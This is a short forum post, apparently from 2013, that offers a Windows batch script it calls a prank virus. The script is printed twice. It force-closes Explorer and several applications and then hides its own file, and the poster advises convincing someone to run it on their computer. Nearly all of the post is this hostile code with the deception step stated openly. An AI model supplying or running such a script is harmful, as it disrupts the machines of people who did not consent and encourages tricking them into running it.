This virus is more of a prank, you just have to convince someone to run it on their computer. It then hides the virus file.
code:
@echo off
taskkill /f /im explorer.exe
if errorlevel 1 taskkill /f /im chrome.exe : taskkill /f /im internetexplore.exe : taskkill /f /im jusched.exe : taskkill /f /im calc.exe : taskkill /f /im mspaint.exe
attrib +h %0
code:
@echo off
taskkill /f /im explorer.exe
if errorlevel 1 taskkill /f /im chrome.exe : taskkill /f /im internetexplore.exe : taskkill /f /im jusched.exe : taskkill /f /im calc.exe : taskkill /f /im mspaint.exe
attrib +h %0
Last edited by deathx on 7/8/2013, 5:32 am; edited 1 time in total (Reason for editing : Error Occured)